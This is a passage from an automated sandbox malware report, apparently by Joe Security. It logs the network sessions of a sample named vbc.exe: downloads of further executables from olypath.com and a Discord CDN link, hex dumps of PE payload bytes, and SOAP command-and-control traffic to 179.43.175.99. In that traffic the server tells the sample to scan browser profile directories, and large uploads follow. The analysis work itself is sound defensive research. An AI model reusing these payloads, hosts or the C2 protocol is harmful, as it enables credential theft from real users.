1 IN HTTP/1.1 200 OKDate: Tue, 22 Feb 2022 14:30:25 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 22 Feb 2022 07:24:47 GMTETag: "3800-5d8963e65e9ce"Accept-Ranges: bytesContent-Length: 14336Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 8f 14 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 2e 00 00 00 08 00 00 00 00 00 00 de 4d 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 4d 00 00 53 00 00 00 00 60 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 50 4c 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 2d 00 00 00 20 00 00 00 2e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 60 00 00 00 06 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 4d 00 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 31 00 00 78 1a 00 00 03 00 00 00 39 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 11 02 00 00 01 00 00 11 28 0b 00 00 0a 16 8d 13 00 00 01 6f 0c 00 00 0a 14 fe 06 0d 00 00 0a 73 0e 00 00 0a 28 01 00 00 2b 28 02 00 00 2b 0a 28 0b 00 00 0a 0b 38 bf 01 00 00 07 16 8d 13 00 00 01 6f 0c 00 00 0a 28 03 00 00 2b 0c 08 16 9a 25 13 08 39 9c 01 00 00 11 08 72 01 00 00 70 28 11 00 00 0a 2d 40 11 08 72 13 00 00 70 28 11 00 00 0a 2d 61 11 08 72 1b 00 00 70 28 11 00 00 0a 2d 6a 11 08 72 23 00 00 70 28 11 00 00 0a 2d 73 11 08 72 2f 00 00 70 28 11 00 00 0a 3a dd 00 00 00 38 4e 01 00 00 08 17 9a 28 0d 00 00 0a 0d 09 16 32 13 09 06 8e 69 2f 0d 09 06 28 06 00 00 06 0a 38 2e 01 00 00 72 39 00 00 70 28 12 00 00 0a 38 1f 01 00 00 08 17 9a 13 04 11 04 06 28 05 00 00 06 28 12 00 00 0a 38 08 01 00 00 08 17 9a 13 04 11 04 06 28 04 00 00 06 28 12 00 00 0a 38 f1 00 00 00 08 18 9a 13 04 08 17 9a 28 0d 00 00 0a 13 05 11 05 06 8e 69 30 59 73 13 00 00 0a 13 06 11 06 72 55 00 00 70 6f 14 00 00 0a 26 11 06 72 59 00 00 70 11 04 11 05 06 28 03 00 00 06 28 04 00 00 2b 6f 14 00 00 0a 26 11 06 72 5f 00 00 70 6f 14 00 00 0a 26 11 06 6f 16 00 00 0a 16 8d 13 00 00 01 6f 17 00 00 0a 28 12 00 00 0a 38 82 00 00 00 72 63 00 00 70 28 12 00 00 0a 2b 76 08 18 9a 13 04 08 17 9a 28 0d 00 00 0a 13 05 11 05 06 8e 69 30 56 73 13 00 00 0a 13 07 11 07 72 55 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb.M `@ @MS`PL H.text- . `.rsrc`0@@.reloc6@BMH1x90(os(+(+(8o(+%9rp(-@rp(-arp(-jr#p(-sr/p(:8N(2i/(8.r9p(8((8((8(i0YsrUpo&rYp((+o&r_po&oo(8rcp(+v(i0VsrU
Session ID Source IP Source Port Destination IP Destination Port Process
2 192.168.2.22 49167 178.18.193.160 80 C:\Users\Public\vbc.exe
Timestamp kBytes transferred Direction Data
Feb 22, 2022 15:30:32.230215073 CET
219 OUT GET /RLBIl.exe HTTP/1.1
Host: olypath.com
Connection: Keep-Alive
Feb 22, 2022 15:30:32.279639006 CET
220 IN HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/x-msdownload
Last-Modified: Tue, 22 Feb 2022 11:23:44 GMT
Accept-Ranges: bytes
Content-Length: 97792
Date: Tue, 22 Feb 2022 14:30:32 GMT
Server: LiteSpeed
Session ID Source IP Source Port Destination IP Destination Port Process
3 192.168.2.22 49168 179.43.175.99 21900 C:\Users\Public\vbc.exe
Timestamp kBytes transferred Direction Data
Feb 22, 2022 15:30:41.645224094 CET
322 OUT POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 179.43.175.99:21900
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Feb 22, 2022 15:30:41.693612099 CET
322 IN HTTP/1.1 100 Continue
Feb 22, 2022 15:30:41.725904942 CET
322 IN HTTP/1.1 200 OKContent-Length: 212Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:30:41 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Feb 22, 2022 15:30:46.752407074 CET
323 OUT POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 179.43.175.99:21900
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate
Feb 22, 2022 15:30:46.773400068 CET
323 IN HTTP/1.1 100 Continue
Feb 22, 2022 15:30:46.841787100 CET
324 IN HTTP/1.1 200 OKContent-Length: 4744Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:30:46 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 
41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry 
xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen
Timestamp kBytes transferred Direction Data
Copyright Joe Security LLC 2022 Page 36 of 65
Session ID Source IP Source Port Destination IP Destination Port Process
4 192.168.2.22 49170 179.43.175.99 21900 C:\Users\Public\vbc.exe
Timestamp kBytes transferred Direction Data
Feb 22, 2022 15:31:01.824354887 CET
335 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 179.43.175.99:21900Content-Length: 152164Expect: 100-continueAccept-Encoding: gzip, deflate
Feb 22, 2022 15:31:01.847295046 CET
335 IN HTTP/1.1 100 Continue
Feb 22, 2022 15:31:02.210525036 CET
486 IN HTTP/1.1 200 OKContent-Length: 147Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:31:02 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Feb 22, 2022 15:31:02.212336063 CET
486 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 179.43.175.99:21900Content-Length: 152156Expect: 100-continueAccept-Encoding: gzip, deflate
Feb 22, 2022 15:31:02.232909918 CET
486 IN HTTP/1.1 100 Continue
Feb 22, 2022 15:31:02.304461002 CET
637 IN HTTP/1.1 200 OKContent-Length: 261Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:31:02 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.2.22 49166 162.159.130.233 443 C:\Users\Public\vbc.exe
Timestamp kBytes transferred Direction Data
2022-02-22 14:30:32 UTC 0 OUT GET /attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htme HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
HTTPS Proxied Packets
2022-02-22 14:30:32 UTC 0 IN HTTP/1.1 200 OKDate: Tue, 22 Feb 2022 14:30:32 GMTContent-Type: application/octet-streamContent-Length: 190464Connection: closeCF-Ray: 6e18e9b23d876919-FRAAccept-Ranges: bytesAge: 49351Cache-Control: public, max-age=31536000Content-Disposition: attachment;%20filename=httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htmeETag: "e04ef1d0eae2971046e9cf8048fdf708"Expires: Wed, 22 Feb 2023 14:30:32 GMTLast-Modified: Mon, 21 Feb 2022 16:54:36 GMTVary: Accept-EncodingCF-Cache-Status: HITAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"x-goog-generation: 1645462476625965x-goog-hash: crc32c=SNuxog==x-goog-hash: md5=4E7x0OrilxBG6c+ASP33CA==x-goog-metageneration: 1x-goog-storage-class: STANDARDx-goog-stored-content-encoding: identityx-goog-stored-content-length: 190464X-GUploader-UploadID: ADPycdvVV7eWCzW3kX5n78ji9Yv3dpUPb1irIctXNyCwHGIC8y-2OJTqv6I66Oi16Ll6sIBUKRbxB6a1LgoiRchMOxcX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2022-02-22 14:30:32 UTC 1 IN Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 7a 58 36 4a 68 4e 73 64 34 25 32 46 54 79 69 76 42 6b 72 65 56 62 5a 58 30 51 25 32 42 32 73 78 72 33 35 6a 65 6a 76 31 33 72 76 6a 68 66 6d 6a 7a 73 7a 7a 6a 25 32 46 70 79 70 79 53 50 44 4e 42 41 63 58 35 6f 61 49 73 49 7a 64 38 78 38 6c 6c 25 32 42 38 34 62 48 57 66 34 5a 39 59 50 6b 67 54 47 78 6a 37 70 66 35 6c 43 25 32 46 30 57 34 54 39 70 6a 76 39 59 45 7a 36 68 36 44 69 78 62 77 53 38 62 70 34 47 36 36 59 4c 6d 57 7a 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zX6JhNsd4%2FTyivBkreVbZX0Q%2B2sxr35jejv13rvjhfmjzszzj%2FpypySPDNBAcX5oaIsIzd8x8ll%2B84bHWf4Z9YPkgTGxj7pf5lC%2F0W4T9pjv9YEz6h6DixbwS8bp4G66YLmWzw%3D%3D"}],"group":"cf-nel","max_a
2022-02-22 14:30:32 UTC 1 IN Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 85 03 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 b6 02 00 00 30 00 00 00 00 00 00 ae d4 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL2b!0 @ @`
2022-02-22 14:30:32 UTC 2 IN Data Raw: fe 0c 02 00 58 4a 54 fe 0c 04 00 fe 0c 0e 00 20 00 00 00 00 9c fe 0c 0e 00 20 01 00 00 00 58 fe 0e 0e 00 fe 0c 01 00 20 08 00 00 00 58 fe 0e 01 00 38 d3 fd ff ff fe 0c 08 00 fe 0c 0e 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 08 00 fe 0c 0e 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 08 00 fe 0c 0e 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 61 54 fe 0c 04 00 fe 0c 0e 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 0e 00 20 01 00 00 00 59 fe 0e 0e 00 38 6c fd ff ff fe 0c 08 00 fe 0c 0e 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 80 01 00 00 04 fe 0c 0e 00 20 01 00 00 00 59 fe 0e 0e 00 38 3f fd ff ff 20 01 00 00 00 fe 0e 0b 00 38 31 fd ff ff 00 2a 1a 28 01 00 00 0a 2a 2a fe 09 00 00 28 02 00 00 0a 2a 00 13 30 03 00 32 00 00 00 00 00 00 00 20 02 00 00 00 8d Data Ascii: XJT X X8 Y YJ YJaT Y Y8l YJ Y8? 81*(**(*02
2022-02-22 14:30:32 UTC 4 IN Data Raw: 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 13 ff ff ff fe 0c 02 00 fe 0c 0c 00 fe 0c 01 00 fe 0c 00 00 fe 0c 0e 00 58 4a 9a a2 fe 0c 0b 00 fe 0c 0c 00 20 05 00 00 00 9c fe 0c 0c 00 20 01 00 00 00 58 fe 0e 0c 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 cc fe ff ff fe 0c 02 00 fe 0c 0c 00 20 01 00 00 00 59 9a 74 03 00 00 02 7e 04 00 00 04 fe 0c 00 00 fe 0c 0e 00 58 4a 97 29 06 00 00 11 fe 0c 0c 00 20 01 00 00 00 59 fe 0e 0c 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 82 fe ff ff fe 0c 00 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 05 00 5a 58 fe 0e 00 00 38 53 fe ff ff 00 2a 2a fe 09 00 00 28 08 00 00 0a 2a 00 00 00 13 30 00 00 06 00 00 00 00 00 00 00 28 0c 00 00 06 2a 00 00 13 30 03 Data Ascii: 8888XJ X X8 Yt~XJ) Y X8((%~a Y ZX8S**(*0(*0
2022-02-22 14:30:32 UTC 5 IN Data Raw: 07 00 fe 0c 04 00 20 01 00 00 00 59 9a 74 04 00 00 1b 80 08 00 00 04 fe 0c 04 00 20 01 00 00 00 59 fe 0e 04 00 38 51 fc ff ff 00 38 4b fc ff ff fe 0c 05 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0b 00 5a 58 fe 0e 05 00 38 1c fc ff ff 00 2a 00 00 13 30 06 00 7a 03 00 00 0c 00 00 11 fe 0d 06 00 25 20 01 00 00 00 54 46 fe 0e 0a 00 fe 0c 0a 00 20 04 00 00 00 5a fe 0e 03 00 fe 0c 0a 00 20 08 00 00 00 5a fe 0e 0e 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 02 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 05 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 00 00 fe 0e 04 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 08 00 7f 4d 00 00 04 fe 0e 09 00 fe 0c 09 00 fe 0e 0b 00 fe 0c 0b 00 fe 0e 0d 00 Data Ascii: Yt Y8Q8K((%~a Y ZX8*0z% TF Z Z % M
2022-02-22 14:30:32 UTC 6 IN Data Raw: 00 38 d5 00 00 00 38 7c 00 00 00 38 77 00 00 00 20 06 00 00 00 fe 0c 01 00 3f 3e 00 00 00 20 06 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 60 01 00 00 20 05 00 00 00 fe 0c 01 00 3f 18 00 00 00 20 05 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 27 01 00 00 38 30 00 00 00 38 2b 00 00 00 20 07 00 00 00 fe 0c 01 00 3f 18 00 00 00 20 07 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 5b 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 a1 fe ff ff fe 0c 05 00 fe 0c 0c 00 7e 0b 00 00 04 fe 0c 0b 00 fe 0c 03 00 58 4a 97 29 09 00 00 11 a2 fe 0c 02 00 fe 0c 0c 00 20 05 00 00 00 9c fe 0c 0c 00 20 01 00 00 00 58 fe 0e 0c 00 fe 0c 0b 00 20 08 00 00 00 58 fe 0e 0b 00 38 54 fe ff ff fe 0c 02 00 fe 0c 0c 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 0c 00 20 01 00 00 00 59 fe 0c Data Ascii: 88|8w ?> =8` ? =8'808+ ? =8[888~XJ) X X8T Y Y
2022-02-22 14:30:32 UTC 8 IN Data Raw: 0b 00 38 57 fd ff ff fe 0c 0b 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0f 00 5a 58 fe 0e 0b 00 38 28 fd ff ff 00 fe 0c 05 00 fe 0c 0c 00 20 01 00 00 00 59 9a 2a 00 00 13 30 06 00 7a 03 00 00 10 00 00 11 fe 0d 01 00 25 20 01 00 00 00 54 46 fe 0e 0f 00 fe 0c 0f 00 20 04 00 00 00 5a fe 0e 02 00 fe 0c 0f 00 20 08 00 00 00 5a fe 0e 06 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 05 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 04 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0e 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 07 00 fe 0e 03 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 09 00 7f 50 00 00 04 fe 0e 08 00 fe 0c 08 00 fe 0e 0b 